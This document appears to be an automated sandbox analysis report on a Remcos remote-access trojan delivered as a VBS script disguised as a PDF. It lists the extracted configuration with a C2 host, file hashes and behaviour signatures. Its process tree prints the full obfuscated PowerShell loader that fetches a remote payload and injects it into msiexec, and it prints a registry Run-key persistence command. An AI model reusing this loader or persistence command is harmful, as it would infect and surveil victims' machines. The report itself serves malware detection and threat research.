Overview

overview

10

Static

static

1

FE_5060207...df.vbs

windows7-x64

10

FE_5060207...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    27-11-2024 15:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FE_50602072400310161019800100024010042047501200000000·pdf.vbs

  • Size

    33KB

  • MD5

    d6f45ebf3891c5dbabcc90063267a500

  • SHA1

    e5943a4dcacd697d58287bf70e45cf054015e881

  • SHA256

    1bd88defe4347880e470dc8536cab819495a34c4320b1dac9fa4952e730f0962

  • SHA512

    25952f18ea9a949b745de4822e9a6830ea6c16d643d996db9275f8be7bc10be70a40581b48034be5ebd07720f229b54b38b7effa4e274c9a795314669a388cff

  • SSDEEP

    768:YNdasoF+ZTskr3M28uNK7Rkc94VhNxLKe9KhZh9H5u7jCx4GVVBXgdrnGu:6dasOaAkrHoNYjbU/z9jQdCu

Score
10/10
remcosremotehostdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FE_50602072400310161019800100024010042047501200000000·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Handball='Pseudonavicular';;$Spondylexarthrosis='Tyrannerne';;$Reweighed='Tornadoerne';;$Widriks='Ensuant';;$Sparkede='Dewanny';;$Sonder=$host.Name;function Burntweed($Sproggrnsernes){If ($Sonder) {$Landgang=4} for ($Seneskeden=$Landgang;;$Seneskeden+=5){if(!$Sproggrnsernes[$Seneskeden]) { break }$Ballparks+=$Sproggrnsernes[$Seneskeden]}$Ballparks}function Uniformistisk86($Sandflugters){ .($Perspektiverings) ($Sandflugters)}$bilinigrin=Burntweed ' epon HoneHavaTMygg.EverwWl.nEL.baBAm.jCYoselBodliSinge dun AniT';$Mercia=Burntweed ',omhM T po CovzEmuliFjellOperlM.laaAlle/';$Forretningsomraades=Burntweed 'OrthTFlysl Inas Eft1Resu2';$Certificering=' aan[Paten kaEVexeT.ele.PromSPeddePostrSlurVStteIOverc DagEMa ePS.nkO TamIDicanrucgTDe amAnstADisiNExt aIns GKenseMul r Int] Svr: Ind: aftspa aeProlC visuzollRBg,riHeroTTotayLomep TrarKlinOIlliTParaOT,llcN npO ShaLSne,=Pahl$ ,okFFlo Oa,tirRullRsupeEDia,TArgiN apei c.un.bjeg,irrsForeO u hm zurrBiotASterAOpsidNonieA.kyS';$Mercia+=Burntweed 'Fr e5S,nd.Vann0Smer Geog( AarWI.lti,xpinFa hdRunwo SnkwLidls Am. bentNDdseT nge Biwe1 St,0Strm.To.e0 maj;Plum ugWBrygiSa,en ber6Str.4 rbe;Papi b stxDedu6go e4Heir;Kirs Wr arChirvAsco:U,su1 ota3Tort1 Ber. Act0 Vkk)L,gg Col G DekeS ikcHerakFibeograv/Kalf2Stan0 lag1Pot,0Af,y0Nymp1Pro,0Unsc1Live Thu FMetaiKv.nrBrize EthfL veoGdenxdura/Livs1R fo3Gamb1Like.Udfl0';$Phalerate219=Burntweed 'ThorUWricS BruEryt,rFlle-FlleaMar GTopve.hanNFortt';$Tumpline=Burntweed 'Forfh.ntit llytQuadp usss Dak: Sai/Reat/Linjd subrge.li tudv mtseKnip.Enklgdigno HoloSvipgFormlLaane tel.Prerc UdsoidiomRegr/sinuuFagrcPred? Ge e socxLampp F ioO,errKlumtParc=Smled AltoRomawEbonnHylelPeepoUndea Bn.dAffi&DagdiP stdAma,=Jubi1 Spe4 AnoM A i4UdkrI VenFBrigOAnfghre,u1 HjeLUntrYFo,k9VaanSIsl,D PugULys nGlemxFruezCad KRa,gJvelb8Beam4Gapl7Tacka Var4 can7GranX Daaytri j ChaELocuECombl EliM';$Outhearing=Burntweed 'Over>';$Perspektiverings=Burntweed 'GeneiSp ge Mamx';$Sybotic='Retspraksisers';$Gisant='\Regionplanloves116.Hal';Uniformistisk86 (Burntweed 'Forr$S.imGMisrL Gulo.tteb By,AMea lHol.:PolyCF.ydOGrn n rugT .ftiMaloNEpi UC gnaSteptVeste KulnKr dEKo tSIndeSS nh9neut1.rdr=Ball$ PanE AfsNSimpvScot: FeaAVallp twap SanDIndga RaptBeviaElek+aspi$ChopgZi miTff sFlnsADimsN A tt');Uniformistisk86 (Burntweed 'Xmlr$ SkrgNe.bLCanaODoolBK ugA.omblAn e:QuirlOverE La G St,I ,ogt SnoISt.dMPr fIAf.az FibeRntgr g.n8Efte3Opht=Vens$MototOv.ruRo aMReinpRufuLRariI ,aanMuddERefl..odhsBenepWeasLSkbniRevitSolb(Gar,$UnemoStufUCuestT maHDebuE.ommaBe,oRDevai vernU plGLang)');Uniformistisk86 (Burntweed $Certificering);$Tumpline=$Legitimizer83[0];$Disnature9=(Burntweed 'U co$AndrGChorLUnl oKapiBHemoA Co l,emi:SkytGTilse asensno FXebeoFoerrDe esR.ciI drkTem R Voli VinNOmniG teoe SilRUngaN dle AfksP,rt=SndanH rsEChrowFo.s-RockoS mmBScraJParlEspecc U,etVani Sa sAbavy AgosS ortBefrePeriMMesm.Bora$Stinbc raIUnivL .ouIFortNOveriPanigYc.arD ssINstmN');Uniformistisk86 ($Disnature9);Uniformistisk86 (Burntweed '.ati$M noG rakeBiognparafKderob llrForesinveigal ksalprEuroiProcnD magKo teDockrkonon fa e rosH be.DiacH laueAninaS.opdT,leeU orrServsRump[Fl s$ lapPExcihIndeaBe ol IntePyrsrGenoaCivitC,lle ,lm2Aer,1 Dys9Firh] akv=fins$ SupMIsureOphirm hmcS.rmioptra');$Corrading=Burntweed 'I df$AltiGRovee Pacn ndsfPlseoSki rArvesR.geiU.ytkAutor Legi be n BorgKirkeYar,rTelen rooePectsTurn.CullDS rvoLandwSlaanIstalF,reou.elaClerdRefoFVizsiUdmal F oeMisu(Sub.$ImprT .anu HurmVrnep txulNynni ordnSpleebutt,Come$ResiVBjrga BetsGausa isklrestlUrkoeAfh rP,annHasteRemp)';$Vasallerne=$Continuateness91;Uniformistisk86 (Burntweed ' Van$M isG Tosl Mico SucbFizzaDi tlPo,y:Mn tTVaa,eEmprL L.vtJa.bHDugdOBugsL.amidPortebeverEpikeSt pSForp=Chef( ennTRutiE AllSKon.tSynt-St pPGlamaLib.T PerH iga Spi$F avVStaba abeSS ara.pruL .lgldan EDis RSupinc,rbE.aro)');while (!$Teltholderes) {Uniformistisk86 (Burntweed 'Gene$BordgTilvlheteoRodobP ogaafdalHypo:GritSBy,njMetaoB rofUdvaeUnderln.ntEfteetopp1Oven9Hjem4Tube=Mika$sulfB A seOptesTilstSkamoPr grUnmimf,rle Forl armsHavieSamdnT ers') ;Uniformistisk86 $Corrading;Uniformistisk86 (Burntweed 'TempsRgestAll aFichR.isaTosch- sulsDe,lLKurseLa rePalePmese Over4');Uniformistisk86 (Burntweed 'Meni$En uG TetLSen,oOverBAkryA BibLI.vo:Hat T Me eEpicLGnetT epeh,ophoBoksl ZiadFl.rE SacrLaaneForbsVen =Opva( BletFigeeUndgSBedrtKimm-For p Fava aptInh Hvedh Enva$S llv shoAFlamSMdelAO.thL EnhLIreneAtesRCampNNonaELept)') ;Uniformistisk86 (Burntweed 'Sulf$PopuGTa,tLUnc OStitB MarAMaskLShar:KredsNomit allOLsblr BrikCot.B TieSBash=For $ revGS,erLtoshODaabBN ncaStralblac: okkmAboreAm lLLu,aL Ou E e,eM RhysVaabT QuiaJenmDturmIAlarEGrmmrMoti+Chry+Ma i%Moni$Bo rlmu aeUvedgBestistarTTastiAlgoM BaniDramZRetleCribRHols8Inst3 ilt.Resec iljoJudau,uasnTospT') ;$Tumpline=$Legitimizer83[$storkbs]}$Seneskedenntrudress=320480;$Personificerede=30318;Uniformistisk86 (Burntweed 'Swan$S.dlGStilLLedeoTidsB Giga.rveLUros:ReprA Chon SubiTse S agB BruoUnreLAryaC EsuhEft eBaghSQuib Waft=Reac UrdeGRasteHrf.TStvn-huleC.rneOTo,bnM ndTSlamE Godn nrat eas Afsk$OppeVMetaAud.mS orba P alkovelUltrEFro RUnrun Deke');Uniformistisk86 (Burntweed ' Sm $ Se g F.llPhy oRengb DiraMerclFond:HuslSCoatlUnthuUnegbS rmr EntePatatCyli Syn =St i Gru [Co tS Na,yDrm.sWar.t En eBranmtouc. Wo.C ccroschwnHurrvInteeUnc rPr ttCh o]Psy,:Hen :Sn rFl forCowboHandm jerBDestaEffes Mule onc6 Unt4YnglSUnpotBendr ,roiTandnPlumg .no(Udvi$StavaStavnFilmiTho,sSpeabGilloMicrlDiv c PhahordneU imsMart)');Uniformistisk86 (Burntweed 'Hnde$ FodG.ndul FakOP,anb OttAOverlTe e: BygS Volp OmoEgrydk Bact emiRAr oO SynGActiR KonaPodof ModeN.tenBefosUnvi Ska =P ot Un,a[T adsYderyTegnSHe it SkyeUnenmBe,k.Ozelt oveE ParX onTFrit. naEPorknS.ntCPrepOSel.DSkumI ChenForhgRust]Kloa:Noum:LyseALangS,vilcSyleIThisi O j. Kung,upeESu,etShipSAndeT B sR PlaI UnsnSnozg Sat(I df$SkrusIterLTaxiUKommbTyngR DoneIntotUnri)');Uniformistisk86 (Burntweed 'Excu$LinkgAlveL P roSvanBB reAVandl.hri:MateCke kE E.sR yrseKommmWildo KarN BijIS reaGrunlWaspIIntesCoe,MFo d=Unde$Ti.bSCy lpcoacESunskUnaltVelbRSultOProggIne rMineAAferFR ceEfagbNTimbSCavi.neglsEkskUNectBSjussBasttprecrJagtiUns.NUdlaGUnde(Bede$ForeSDiste jesNMiekEHjl,SRe,ik Enge B.lDS orEFo aNArc N FarTSt lRTunguFlerDAfbrrCh.ieSa as Atts un, ety$enk.P BehE ubvrSileSFiluo Gr NClauIHaidFUnr IJordCAnt.eUpg RAspieRelaD,iffEfrad)');Uniformistisk86 $Ceremonialism;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2848
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Handball='Pseudonavicular';;$Spondylexarthrosis='Tyrannerne';;$Reweighed='Tornadoerne';;$Widriks='Ensuant';;$Sparkede='Dewanny';;$Sonder=$host.Name;function Burntweed($Sproggrnsernes){If ($Sonder) {$Landgang=4} for ($Seneskeden=$Landgang;;$Seneskeden+=5){if(!$Sproggrnsernes[$Seneskeden]) { break }$Ballparks+=$Sproggrnsernes[$Seneskeden]}$Ballparks}function Uniformistisk86($Sandflugters){ .($Perspektiverings) ($Sandflugters)}$bilinigrin=Burntweed ' epon HoneHavaTMygg.EverwWl.nEL.baBAm.jCYoselBodliSinge dun AniT';$Mercia=Burntweed ',omhM T po CovzEmuliFjellOperlM.laaAlle/';$Forretningsomraades=Burntweed 'OrthTFlysl Inas Eft1Resu2';$Certificering=' aan[Paten kaEVexeT.ele.PromSPeddePostrSlurVStteIOverc DagEMa ePS.nkO TamIDicanrucgTDe amAnstADisiNExt aIns GKenseMul r Int] Svr: Ind: aftspa aeProlC visuzollRBg,riHeroTTotayLomep TrarKlinOIlliTParaOT,llcN npO ShaLSne,=Pahl$ ,okFFlo Oa,tirRullRsupeEDia,TArgiN apei c.un.bjeg,irrsForeO u hm zurrBiotASterAOpsidNonieA.kyS';$Mercia+=Burntweed 'Fr e5S,nd.Vann0Smer Geog( AarWI.lti,xpinFa hdRunwo SnkwLidls Am. bentNDdseT nge Biwe1 St,0Strm.To.e0 maj;Plum ugWBrygiSa,en ber6Str.4 rbe;Papi b stxDedu6go e4Heir;Kirs Wr arChirvAsco:U,su1 ota3Tort1 Ber. Act0 Vkk)L,gg Col G DekeS ikcHerakFibeograv/Kalf2Stan0 lag1Pot,0Af,y0Nymp1Pro,0Unsc1Live Thu FMetaiKv.nrBrize EthfL veoGdenxdura/Livs1R fo3Gamb1Like.Udfl0';$Phalerate219=Burntweed 'ThorUWricS BruEryt,rFlle-FlleaMar GTopve.hanNFortt';$Tumpline=Burntweed 'Forfh.ntit llytQuadp usss Dak: Sai/Reat/Linjd subrge.li tudv mtseKnip.Enklgdigno HoloSvipgFormlLaane tel.Prerc UdsoidiomRegr/sinuuFagrcPred? Ge e socxLampp F ioO,errKlumtParc=Smled AltoRomawEbonnHylelPeepoUndea Bn.dAffi&DagdiP stdAma,=Jubi1 Spe4 AnoM A i4UdkrI VenFBrigOAnfghre,u1 HjeLUntrYFo,k9VaanSIsl,D PugULys nGlemxFruezCad KRa,gJvelb8Beam4Gapl7Tacka Var4 can7GranX Daaytri j ChaELocuECombl EliM';$Outhearing=Burntweed 'Over>';$Perspektiverings=Burntweed 'GeneiSp ge Mamx';$Sybotic='Retspraksisers';$Gisant='\Regionplanloves116.Hal';Uniformistisk86 (Burntweed 'Forr$S.imGMisrL Gulo.tteb By,AMea lHol.:PolyCF.ydOGrn n rugT .ftiMaloNEpi UC gnaSteptVeste KulnKr dEKo tSIndeSS nh9neut1.rdr=Ball$ PanE AfsNSimpvScot: FeaAVallp twap SanDIndga RaptBeviaElek+aspi$ChopgZi miTff sFlnsADimsN A tt');Uniformistisk86 (Burntweed 'Xmlr$ SkrgNe.bLCanaODoolBK ugA.omblAn e:QuirlOverE La G St,I ,ogt SnoISt.dMPr fIAf.az FibeRntgr g.n8Efte3Opht=Vens$MototOv.ruRo aMReinpRufuLRariI ,aanMuddERefl..odhsBenepWeasLSkbniRevitSolb(Gar,$UnemoStufUCuestT maHDebuE.ommaBe,oRDevai vernU plGLang)');Uniformistisk86 (Burntweed $Certificering);$Tumpline=$Legitimizer83[0];$Disnature9=(Burntweed 'U co$AndrGChorLUnl oKapiBHemoA Co l,emi:SkytGTilse asensno FXebeoFoerrDe esR.ciI drkTem R Voli VinNOmniG teoe SilRUngaN dle AfksP,rt=SndanH rsEChrowFo.s-RockoS mmBScraJParlEspecc U,etVani Sa sAbavy AgosS ortBefrePeriMMesm.Bora$Stinbc raIUnivL .ouIFortNOveriPanigYc.arD ssINstmN');Uniformistisk86 ($Disnature9);Uniformistisk86 (Burntweed '.ati$M noG rakeBiognparafKderob llrForesinveigal ksalprEuroiProcnD magKo teDockrkonon fa e rosH be.DiacH laueAninaS.opdT,leeU orrServsRump[Fl s$ lapPExcihIndeaBe ol IntePyrsrGenoaCivitC,lle ,lm2Aer,1 Dys9Firh] akv=fins$ SupMIsureOphirm hmcS.rmioptra');$Corrading=Burntweed 'I df$AltiGRovee Pacn ndsfPlseoSki rArvesR.geiU.ytkAutor Legi be n BorgKirkeYar,rTelen rooePectsTurn.CullDS rvoLandwSlaanIstalF,reou.elaClerdRefoFVizsiUdmal F oeMisu(Sub.$ImprT .anu HurmVrnep txulNynni ordnSpleebutt,Come$ResiVBjrga BetsGausa isklrestlUrkoeAfh rP,annHasteRemp)';$Vasallerne=$Continuateness91;Uniformistisk86 (Burntweed ' Van$M isG Tosl Mico SucbFizzaDi tlPo,y:Mn tTVaa,eEmprL L.vtJa.bHDugdOBugsL.amidPortebeverEpikeSt pSForp=Chef( ennTRutiE AllSKon.tSynt-St pPGlamaLib.T PerH iga Spi$F avVStaba abeSS ara.pruL .lgldan EDis RSupinc,rbE.aro)');while (!$Teltholderes) {Uniformistisk86 (Burntweed 'Gene$BordgTilvlheteoRodobP ogaafdalHypo:GritSBy,njMetaoB rofUdvaeUnderln.ntEfteetopp1Oven9Hjem4Tube=Mika$sulfB A seOptesTilstSkamoPr grUnmimf,rle Forl armsHavieSamdnT ers') ;Uniformistisk86 $Corrading;Uniformistisk86 (Burntweed 'TempsRgestAll aFichR.isaTosch- sulsDe,lLKurseLa rePalePmese Over4');Uniformistisk86 (Burntweed 'Meni$En uG TetLSen,oOverBAkryA BibLI.vo:Hat T Me eEpicLGnetT epeh,ophoBoksl ZiadFl.rE SacrLaaneForbsVen =Opva( BletFigeeUndgSBedrtKimm-For p Fava aptInh Hvedh Enva$S llv shoAFlamSMdelAO.thL EnhLIreneAtesRCampNNonaELept)') ;Uniformistisk86 (Burntweed 'Sulf$PopuGTa,tLUnc OStitB MarAMaskLShar:KredsNomit allOLsblr BrikCot.B TieSBash=For $ revGS,erLtoshODaabBN ncaStralblac: okkmAboreAm lLLu,aL Ou E e,eM RhysVaabT QuiaJenmDturmIAlarEGrmmrMoti+Chry+Ma i%Moni$Bo rlmu aeUvedgBestistarTTastiAlgoM BaniDramZRetleCribRHols8Inst3 ilt.Resec iljoJudau,uasnTospT') ;$Tumpline=$Legitimizer83[$storkbs]}$Seneskedenntrudress=320480;$Personificerede=30318;Uniformistisk86 (Burntweed 'Swan$S.dlGStilLLedeoTidsB Giga.rveLUros:ReprA Chon SubiTse S agB BruoUnreLAryaC EsuhEft eBaghSQuib Waft=Reac UrdeGRasteHrf.TStvn-huleC.rneOTo,bnM ndTSlamE Godn nrat eas Afsk$OppeVMetaAud.mS orba P alkovelUltrEFro RUnrun Deke');Uniformistisk86 (Burntweed ' Sm $ Se g F.llPhy oRengb DiraMerclFond:HuslSCoatlUnthuUnegbS rmr EntePatatCyli Syn =St i Gru [Co tS Na,yDrm.sWar.t En eBranmtouc. Wo.C ccroschwnHurrvInteeUnc rPr ttCh o]Psy,:Hen :Sn rFl forCowboHandm jerBDestaEffes Mule onc6 Unt4YnglSUnpotBendr ,roiTandnPlumg .no(Udvi$StavaStavnFilmiTho,sSpeabGilloMicrlDiv c PhahordneU imsMart)');Uniformistisk86 (Burntweed 'Hnde$ FodG.ndul FakOP,anb OttAOverlTe e: BygS Volp OmoEgrydk Bact emiRAr oO SynGActiR KonaPodof ModeN.tenBefosUnvi Ska =P ot Un,a[T adsYderyTegnSHe it SkyeUnenmBe,k.Ozelt oveE ParX onTFrit. naEPorknS.ntCPrepOSel.DSkumI ChenForhgRust]Kloa:Noum:LyseALangS,vilcSyleIThisi O j. Kung,upeESu,etShipSAndeT B sR PlaI UnsnSnozg Sat(I df$SkrusIterLTaxiUKommbTyngR DoneIntotUnri)');Uniformistisk86 (Burntweed 'Excu$LinkgAlveL P roSvanBB reAVandl.hri:MateCke kE E.sR yrseKommmWildo KarN BijIS reaGrunlWaspIIntesCoe,MFo d=Unde$Ti.bSCy lpcoacESunskUnaltVelbRSultOProggIne rMineAAferFR ceEfagbNTimbSCavi.neglsEkskUNectBSjussBasttprecrJagtiUns.NUdlaGUnde(Bede$ForeSDiste jesNMiekEHjl,SRe,ik Enge B.lDS orEFo aNArc N FarTSt lRTunguFlerDAfbrrCh.ieSa as Atts un, ety$enk.P BehE ubvrSileSFiluo Gr NClauIHaidFUnr IJordCAnt.eUpg RAspieRelaD,iffEfrad)');Uniformistisk86 $Ceremonialism;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\Software\Alperoses\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%baggrundshistorien% -windowstyle 1 $Lagertilgangens=(gp -Path 'HKCU:\Software\Alperoses\').Inddrev;%baggrundshistorien% ($Lagertilgangens)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2112

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    61ea33c72a93df488fd8a10d7adf16e3

    SHA1

    ed4460ad0297af6ea9621b96aad1ecbc9f03bec9

    SHA256

    e0f9e156e30410c11adead8f92719b43a2a42a783374d4f13cf2f2c7f66df31d

    SHA512

    ebefea2a82e1eb7af5401c119742cf1510abb181e42e0a816217f0d9f7019d855c9724dcfb32b5df0ef83a45d7d13b002e1858b1a76e031a46da312c0c2885b2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab7D8B.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarF5D.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FKVP13S8XVJ37O3W5LD8.temp
    Filesize

    7KB

    MD5

    f7c4d5e92fa6dcc49a406cf6a30b40bd

    SHA1

    0066a99da41ae211ffdc842d52aa996c7cd233a8

    SHA256

    85779e841dba0edb175aba13812911825f7194866700db8f9a0d73d384fcf6c2

    SHA512

    fcabae19a72cfc0a2c62558eb5ffc19aa5724740f70426cabba999967952b0767101741f28333491ffde7ce9fa91c6ffd870a9f90339bb15e8cce5fc1cdc5395

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Regionplanloves116.Hal
    Filesize

    456KB

    MD5

    8ec47102febb97ad1c7a345edb25cdf0

    SHA1

    90300656eec3de3de250aefe3b8396dbabb976c9

    SHA256

    d921e5f8eefde43e70155e052a54ddec37e5aa7fbf46bd5e30b63b350d3d5667

    SHA512

    23b4891e72d22e1d50bc574453b0e22667f678f0a10f774e0791503857d25650b65351f8be06ad7f46b08320a8a7b41c06f44834bddca075a7bac2ff62975c12

    Download Submit

  • memory/1456-37-0x00000000066C0000-0x0000000007914000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2516-61-0x0000000000C90000-0x0000000001CF2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2516-60-0x0000000000C90000-0x0000000001CF2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2848-24-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2848-28-0x000007FEF647E000-0x000007FEF647F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2848-29-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2848-31-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2848-33-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2848-27-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2848-26-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2848-25-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2848-21-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2848-23-0x000007FEF61C0000-0x000007FEF6B5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2848-22-0x0000000001F80000-0x0000000001F88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2848-20-0x000007FEF647E000-0x000007FEF647F000-memory.dmp

    Filesize

    4KB

    Download